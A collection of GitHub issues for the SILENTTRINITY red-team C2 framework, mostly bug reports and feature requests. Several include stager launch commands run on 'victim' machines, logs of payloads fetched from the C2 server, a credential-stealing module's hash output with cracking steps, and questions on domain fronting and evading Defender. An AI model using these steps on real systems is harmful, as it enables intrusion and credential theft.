• SILENTTRINITY Version: 0.1.0dev (c2_crypt)
• Operating System: Latest Kali Linux
• Python Version: 3.7.2
• Listener: HTTPS
• Stager: msbuild
• Victim OS: Windows 10 Pro (10.0.17763.0)

When a new session is connected, SSLErrors start spamming out.
However, the session remains alive and can run modules without problems.

https://github.com/microsoft/ClearScript

Cause reasons :)

Hey,
I would love to see cmedb get integrated with ST . Normally, wouldn't have asked this but since you're the creator of both these awesome tools, it made sense.

Like the title say i just want to ask if it is possible to implement renaming the agent after he pop upp like in Empire?!
Thanks for the amazing work and like i already said on twitter you are an amazing coder and pentester, one of the best!!! and all your github prove it!!!

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

• SILENTTRINITY Version: 0.1.0dev
• Operating System:Microsoft Windows [Version 6.1.7601]/.net v4.0.30319 /Kali 2019.1
• Python Version:3.7

Expected Behavior

run module ipy/mimikatz without generating an exception

Current Behavior

Launching the build on the Windows target system sometimes generates a 'HMAC not valid' exception. File"/root/SILENTTRINITY/Server/core/crypto.py", line 99, in decrypt raise CryptoException("HMAC not valid")
Sometimes it works to create the session and then running the ipy/mimikatz module creates the same exception.
Often everything works fine.

Failure Information

After error occurs, module will not run

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

Start Silent Trinity
cd SILENTTRINITY/Server/
python3.7 st.py -d
Start http Listener
listeners
use http
start
#run the following in a command shell \Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \192.168.88.128\SMB\msbuild.xml
#wait for the new session
sessions
modules
use ipy/mimikatz
run all

Failure Logs

Please include any relevant log snippets or files here. Try using: python3.7 st.py -d to get more information.

Issue Template

Context

Doing test with ST

• SILENTTRINITY Version: last one
• Operating System: kali linux full update / windows 10 full update
• Python Version: 3.7

Failure Information

Everything run fine ... until i got this (windows side)

PS C:\Users\ddd\Documents> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.7.3056.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.

La génération a démarré 01/08/2019 16:56:07.
URL: http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60

Trying to resolve assemblies by staging zip
Attempting HTTP POST to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Attempting HTTP GET to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Downloaded 1950224 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Dynamic.dll in zip
'Microsoft.Dynamic, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.Modules.dll in zip
'IronPython.Modules, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Did not find IPY stdlib in embedded resources: La séquence ne contient aucun élément.
Found IronPython.dll in zip
Found Main.py in zip

And then no session is created on ST

i apologize if it's my fault because i miss something ... but i can't figure out what by now

thanks

Since we got Pypykatz working with the minidump module now, it would be nice to have a database to store the creds we get instead of just outputting them to the screen. Since I'm gonna want ST to work with CrackMapExec, we might want to make sure the databases are compatible with each other.

Hey,
Is it possible to add mshta based exploits? Generating html applications and running it with mshta shouldn't be a problem, I guess.

Issue Template

Context

boo/internalmonologue doesn't show whether hash is NTLMv1 or NTLMv2, and gives wrong format for NTLMv2 hashes.

Upstream repo doesn't accept issues, so per conversation with @byt3bl33d3r I'm filing this here instead.

jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb

• SILENTTRINITY Version: Latest master branch
• OS running the Client: Ubuntu 18.04 x64
• Python Version Running the Client: Python 3.7.4+
• OS running the TeamServer: Ubuntu 18.04 x64 (same system as client)
• Python version running the Teamserver: Python 3.7.4 (same system as client)

Expected Behavior

If internalmonologue attack fails to retrieve an NTLMv1 hash and has to show the NTLMv2 one instead, it should be in the right format.

Current Behavior

Console output below. Victim is Windows 10 Enterprise 1809 as a VM, with Credential Guard enabled (using the Microsoft Device Guard readiness tool:

[1] ST (modules)(boo/internalmonologue) ≫ use boo/getsystem                                                                                                                                                        
[1] ST (modules)(boo/getsystem) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6                                                                                                                                         
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: qDkTV0bDZ4)
Getting system...
Impersonating NT AUTHORITY\SYSTEM...
Processes for NT AUTHORITY\SYSTEM: 37
Attempting to impersonate: NT AUTHORITY\SYSTEM
Successfully impersonated: NT AUTHORITY\SYSTEM

[1] ST (modules)(boo/getsystem) ≫ use boo/internalmonologue                                                                                                                                                        
[1] ST (modules)(boo/internalmonologue) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6                                                                                                                                 
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: mGySQy9xKR)
Running elevated
Performing NTLM Downgrade
Starting impersonation
S-1-5-21-2347759232-2198512603-1203408765-1000 RuntimeBroker
Impersonated user DESKTOP-2LDSJOS\sysadmin
sysadmin::DESKTOP-2LDSJOS:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000:1122334455667788

Restoring NTLM values

Trying to crack that hash with hashcat:

jeff@blue:~/dev/SILENTTRINITY$ sudo hashcat -m 5500 /tmp/ntlmv1.txt /opt/Passwords/breachcompilationuniq.txt -O -w4 --force 2>/dev/null| grep Token
Hashfile '/tmp/ntlmv1.txt' on line 1 (sysadm...64006d0069006e000000000000000000): Token length exception

Per hashcat documentation, the challenge in the NTLMv2 hash is in the wrong place from the internalmonologue attack. The fix is to put it after the computer name, as follows:

jeff@blue:~/dev/SILENTTRINITY$ cat /tmp/hash
sysadmin::DESKTOP-2LDSJOS:1122334455667788:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000

Failure Information

Shown above.

Steps to Reproduce

1. Enable Credential Guard on a Windows 10 machine, physical or virtual.
2. Gain an administrative (or SYSTEM) session and run the boo/internalmonologue module.
3. Behavior is as above.

Failure Logs

I can provide more information if needed, but I think the above is enough to replicate this from scratch.

Hello I believe I have found a bug in recent SILENTTRINITY release.

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

SILENTTRINITY Version: Zuiikin 0.4.0dev
OS running the Client: Arch Linux 
Python Version Running the Client 3.7.4
OS running the TeamServer: Arch Linux 
Python version running the Teamserver: 3.7.4

Expected Behavior

Executing provided .NET assembly from a host machine should give me an output of the said assembly being run on the victim machine.

for eg.
set Assembly /home/user/Downloads/Seatbelt.exe
set Arguments all
run all

Current Behavior

No desired output is returned, instead ST errors with:

[*] [TS-eZ8mR] d7b81c90-e6e4-458c-9505-b5aeb4ec73cb returned job result (id: YE0hRRzQwY)
Error compiling source:
YE0hRRzQwY.boo(11,12): BCE0048: Type 'System.Type' does not support slicing.
YE0hRRzQwY.boo(11,27): BCE0048: Type 'System.Type' does not support slicing.

Failure Information

See the screenshoot for detailed DEBUG information:

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

After installing, pipenv, etc etc... Launch the teamserver python3 teamserver.py 192.168.1.141 pass
Connect client c&c to teamserver python3 st.py wss://username:[email protected]:5000
Set up a listener: listeners, use https, options, start https
Set up a stager: stagers, use powershell, generate https
Copy stager.ps1 to windows victim machine
Execute the stager: powershell -ep bypass .\stager.ps1
Get a session, set up the execute-assembly module and run all.
...

Legacy release works as expected. Please let me know if you need more information and thank you once again for all your time and effort you put into this project.

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb

• SILENTTRINITY Version: Latest master branch
• OS running the Client: Ubuntu 18.04 x64
• Python Version Running the Client: Python 3.7.4+
• OS running the TeamServer: Ubuntu 18.04 x64 (same system as client)
• Python version running the Teamserver: Python 3.7.4 (same system as client)

Expected Behavior

The stop command from within the listeners context should stop the listener.

Current Behavior

Currently I wasn't able to stop a listener other than restarting teamserver.py

Failure Information

[1] ST ≫ listeners                                                                                                                                                                                                 
[1] ST (listeners) ≫ use http                                                                                                                                                                                      
[1] ST (listeners)(http) ≫ set Port 8000                                                                                                                                                                           
[1] ST (listeners)(http) ≫ list                                                                                                                                                                                    
[1] ST (listeners)(http) ≫ start                                                                                                                                                                                   
[1] ST (listeners)(http) ≫ list                                                                                                                                                                                    
┌Running────────────────────────────┐
│ Name │ URL                        │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫ stop                                                                                                                                                                                    
[1] ST (listeners)(http) ≫ list                                                                                                                                                                                    
┌Running────────────────────────────┐
│ Name │ URL                        │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫  

A separate terminal window shows python3 is still listening:

jeff@blue:~/dev/SILENTTRINITY$ lsof -ni | grep :8000
python3 12973 jeff   23u  IPv4 131287      0t0  TCP 10.153.143.148:8000 (LISTEN)

Steps to Reproduce

Start to finish is shown under Failure Information

Failure Logs

I can provide more information if needed, but I think the above is enough to replicate this from scratch.

as per #40 by @egypt

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

• SILENTTRINITY Version:
• Operating System:
• Python Version:

Expected Behavior

Please describe the behavior you are expecting.

Current Behavior

What is the current behavior?

Failure Information

Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. step 1
2. step 2
3. step 3
   ...

Failure Logs

Please include any relevant log snippets or files here. Try using: python3.7 st.py -d to get more information.

Hey there!
Is it possible to update Mimikatz to version 2.1.1-20181209?
Thanks in advance!

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

• SILENTTRINITY Version: 0.1.0dev
• Operating System: Windows 10 x64
• Python Version: 3.7

Expected Behavior

Establish Session between victim windows 10 and ST server running on Kali OS

Current Behavior

When executing msbuild.exe on the generated msbuild.xml file, it fetches the stage.zip successfully but failed to build.

Error is listed below.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. setup SILENTTRINITY as per the installation wiki
2. setup a listener and generate msbuild.xml using the msbuild stager
3. execute the generated command as shown, on the windows 10 x64 victim machine
   ...

Failure Logs

Windows 10 x64 client:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe 'C:\Users\tester\Desktop\msbuild.xml'
Microsoft (R) Build Engine version 4.7.3056.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 26/3/2019 11:39:47 PM.
URL: https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332

Trying to resolve assemblies by staging zip
Attempting HTTP POST to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Attempting HTTP GET to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Downloaded 2068160 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.8.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Project "C:\Users\tester\Desktop\msbuild.xml" on node 1 (default targets).
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)
Done Building Project "C:\Users\tester\Desktop\msbuild.xml" (default targets) -- FAILED.

Build FAILED.

"C:\Users\tester\Desktop\msbuild.xml" (default target) (1) ->
(Hello target) ->
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)

0 Warning(s)
1 Error(s)

Time Elapsed 00:08:15.00

No error from the running st.py on my kali OS.
Able to see the staging established successfully.

Kali OS:
ST (stagers)(msbuild) ≫ generate https
[+] Generated stager to msbuild.xml
[] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[] Sending stage (2068193 bytes) -> 192.168.0.111 ...
ST (stagers)(msbuild) ≫

Context

When trying to navigate through the CLI, typing an invalid option causes the CLI to crash.

• SILENTTRINITY Version: 0.0.1dev
• Operating System: Kali Linux 2.0
• Python Version: 3.7

Expected Behavior

Either going to the modules menu or the application giving an error message.

Current Behavior

Python crashes.

Failure Information

Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.

Steps to Reproduce

ST (modules)(ipconfig) ≫ modules
ST (modules)(ipconfig) ≫ sessions
ST (sessions) ≫ sessions modules
Traceback (most recent call last):
File "st.py", line 143, in <module>
loop()
File "st.py", line 120, in __call__
self.parse_result(result)
File "st.py", line 94, in parse_result
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), ``args=command[1:])
TypeError: the first argument must be callable

Generated resource file is broken

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

• SILENTTRINITY Version: 0.0.1dev
• Operating System: kali-linux
• Python Version: 3.7.1

Expected Behavior

The generated msbuild.res file works correctly.

Current Behavior

The generated msbuild.res file is broken.

Failure Information

A new line char is missing.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
2. cd SILENTTRINNITY/Server
3. pipenv install
4. pipenv shell
5. stvenom.py msbuild http 8089 --ip 10.10.10.1

Failure Logs

Unknown command 'startmodules'

Is it possible to add additional headers for request to facilitate domain fronting? How can I hack the code to get this functionality?

ST ≫ listeners
ST (listeners) ≫ use http
ST (listeners)(http) ≫ set BindIP 10.0.0.113
ST (listeners)(http) ≫ set Port 5000
ST (listeners)(http) ≫ start
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://10.0.0.113:5000 (CTRL + C to quit)
ST (listeners)(http) ≫ stagers
ST (stagers) ≫ list
+Available+--------------------------------------+
| Name | Description |
+---------+--------------------------------------+
| wmic | Stage via wmic XSL execution |
+---------+--------------------------------------+
| msbuild | Stage via MSBuild XML inline C# task |
+---------+--------------------------------------+
ST (stagers) ≫ use msbuild
ST (stagers)(msbuild) ≫ options
+-------------+----------+-------+-------------+
| Option Name | Required | Value | Description |
+-------------+----------+-------+-------------+
ST (stagers)(msbuild) ≫ generate http
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
ST (stagers)(msbuild) ≫ [2019-01-17 10:08:16,259] ERROR in app: Exception on request GET /stage.zip
Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/quart/app.py", line 1436, in handle_request
return await self.full_dispatch_request(request_context)

Wondering why exactly Python 3.7 is needed. Any thoughts? Thanks.

Currently, the Mimikatz module embeds a custom version of SharpSploit to load and execute the Mimikatz DLLs in memory (it's just calling Assembly.Load() on it). From an Opsec perspective this sucks cause it's a static assembly, doesn't get dynamically compiled on the endpoint and it's just another thing AMSI can trigger on in .NET 4.8.

Ideally I would LOVE to port over the SharpSploit PE Loading code to Boolang so this entire issue goes away but it's def not trivial and is going to require a decent amount of time.

Hello

Is it possible to run with a Public IP?

I tried with some options but I was getting connection issues at staging process.

Thanks

hey,
I have just tested your great tool and I have to say that I like it very much! Good job!

But it would be helpful if it would have the possibility to stop single sessions and listeners.

Thank you very much!

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

• SILENTTRINITY Version: 0.1.0
• Operating System: Kali 2018.4 & Also tried on Ubuntu 16.04
• Python Version: 3.7

Expected Behavior

Run a powershell command.

Current Behavior

Throws an error:
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.

Steps to Reproduce

Used msbuild to create agent. I cannot run any command, whether it's just 'dir' or 'ping', I get the same error.

Failure Logs

ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,850] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
[2019-02-08 15:58:44,925] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,933] 192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
INFO:quart.serving:192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,315] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
[2019-02-08 15:58:45,389] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
[+] aa219fb6-8e99-4e23-a7e4-1142a83a5590 returned job result (id: odTHLXlJ)
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,399] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911

Hello,
using ST I'm getting this error:

(SILENTTRINITY) bash-3.2$ python3 teamserver.py IP password
2019-08-11 08:14:41,969 32363 IPCServer - [DEBUG] ipcserver.py: run - Started IPC server on 127.0.0.1:64200
2019-08-11 08:14:42,013 32363 MainThread - [DEBUG] selector_events.py: init - Using selector: KqueueSelector
2019-08-11 08:14:42,184 32363 MainThread - [ERROR] loader.py: get_loadables - Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'
2019-08-11 08:14:42,334 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 4 listener(s)
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: KEY_EXCHANGE -> Sessions.kex
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: ENCRYPT_STAGE -> Sessions.gen_encrypted_stage
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_STAGED -> Sessions.notify_session_staged
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_CHECKIN -> Sessions.session_checked_in
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: NEW_JOB -> Sessions.add_job
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: JOB_RESULT -> Sessions.job_result
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 12 module(s)
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: GET_STAGERS -> Stagers.get_stagers
2019-08-11 08:14:42,344 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 3 stager(s)
2019-08-11 08:14:42,410 32363 MainThread - [WARNING] teamserver.py: server - Teamserver certificate fingerprint: 6e83733b2d06b0b3efe60e9c0bd741b65eb975c0d9f3eee511f4d1a676bc1afc
2019-08-11 08:14:42,411 32363 MainThread - [INFO] teamserver.py: server - Teamserver started on IP:5000

i see this failed:

Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'

using a MacBookPro:
Nome modello: MacBook Pro
Identificatore modello: MacBookPro15,3
Nome processore: Intel Core i9
Velocità processore: 2,9 GHz
Numero di processori: 1
Numero totale di Core: 6
Cache L2 (per Core): 256 KB
Cache L3: 12 MB
Tecnologia Hyper-Threading: Abilitato
Memoria: 32 GB
Versione Boot ROM: 220.270.99.0.0 (iBridge: 16.16.6568.0.0,0)
Versione sistema: macOS 10.14.6 (18G87)
Versione kernel: Darwin 18.7.0
Volume d'avvio: Macintosh HD
Modalità di avvio: Normale

anyone else getting this error ?

Issue Template

Context

I fired up my Windows 10 test VM just now and received an update for Defender Virus & Threat setting (march 4. 2019). Launched the msbuild.xml file and Defender popped a Threat Notification. 2 days ago, Defender did not catch it... yet.

Behavior: Win32/Quiltan.A!sms
Recommended action: Quarantine threat now.

• SILENTTRINITY Version: 0.1.0dev
• Operating System: Kali Linux 2018
• Python Version: 3.7.2

Expected Behavior

Windows Defender as of March 4, 2019 is picking up msbuild.xml being executed. Renaming the msbuild.xml file did not change anything.

Current Behavior

Defender is blocking backdoor connection back to Kali Silenttrinity.

Failure Information

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. Get latest Windows Defender definition update for March 4, 2019.
2. Try to execute C:.....\msbuild.exe msbuild.xml
3. Defender popped up a threat notification.
   ...

Failure Logs

Please include any relevant log snippets or files here. Try using: python3.7 st.py -d to get more information.

Thanks for the awesome work!

I tried to setup/install ST on Kali linux arm and amd64bit followed your step by step instructions however the dependecies fails to install.

OS
Linux nix 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux

errors:

An error occurred while installing aiofiles==0.4.0
An error occurred while installing cryptography==2.7
An error occurred while installing hypercorn==0.6.0
An error occurred while installing hyperframe==5.2.0
An error occurred while installing multidict==4.5.2
An error occurred while installing pycparser==2.19

As per your instructions - python3.7 installed, i also tried pipenv throws similar issues.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
pip3 install pipenv && pipenv install && pipenv shell

Any suggestions ideas? Thanks

In the description it says that .NET 4.5 is needed to run the stagger and the payloads. The python web server throws a "no shared cipher" error. Is this something odd to do with windows 8.1 embedded ? I am going to throw a Console.WriteLine in the inline c# stagger and see if I can get any other info.

Context

• SILENTTRINITY Version: 0.1.0dev
• Operating System: Kali 2019.1
• Python Version: 3.7.3rc1

Expected Behavior

Expected help on sessions, or an error about a non-existent option...

Current Behavior

st.py server crashed when running 'sessions -h'

Failure Information

Steps to Reproduce

1. Start https listener
2. Generate powershell payload
3. create session
4. Run sessions -h from sessions menu

Failure Logs

ST (sessions) ≫ sessions -h
Traceback (most recent call last):
File "st.py", line 163, in
loop()
File "st.py", line 140, in call
self.parse_result(result)
File "st.py", line 95, in parse_result
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
TypeError: the first argument must be callable

I keep forgetting I need to 'start' listeners, vs 'run' modules. It would be nice is ST was a little more forgiving, and both 'run' and 'start' worked to kick off a listener.

Along those same lines, it would be nice if it were not case sensitive with commands. For instance when setting a listening port "set port 8080" throws an 'unknown option port' error because the 'P' was not capitalized.

Current Behavior

Try running a listener with the run command. It wont start. Likely wise when setting a port with a lower case 'p'.

Error when compiling with msbuild.exe

Context

1. I open the project in Visual Studio
2. Generate the project (no error)
3. Convert the SILENTTRINITY_DLL.dll to base64 with Out-CompressedDll -FilePath SILENTTRINITY_DLL.dll
4. Copy the content to msbuild.xml file
5. LaunchC:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
6. Error when compiling

• SILENTTRINITY Version: 0.1.0.dev
• Operating System: Kali / Windows 10 (no defender)
• Python Version: 3.7

Expected Behavior

When I use the default b64 string from the template msbuild.xml no error, but when I use the one from the compiled project, the b64 is not working.

Current Behavior

Error with the base64 of SILENTTRINITY_DLL.dll

Failure Information

Ps$> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.8.3761.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.

La génération a démarré 25/05/2019 19:12:10.
Projet "C:\Users\bonclay\Desktop\msbuild.xml" sur le noud 1 (cibles par défaut).
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.Invoke(Object
 obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()
Génération du projet "C:\Users\bonclay\Desktop\msbuild.xml" terminée (cibles par défaut) -- ÉCHEC.


ÉCHEC de la build.

"C:\Users\bonclay\Desktop\msbuild.xml" (cible par défaut) (1) ->
(Hello1231231321321321 cible) ->
  C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
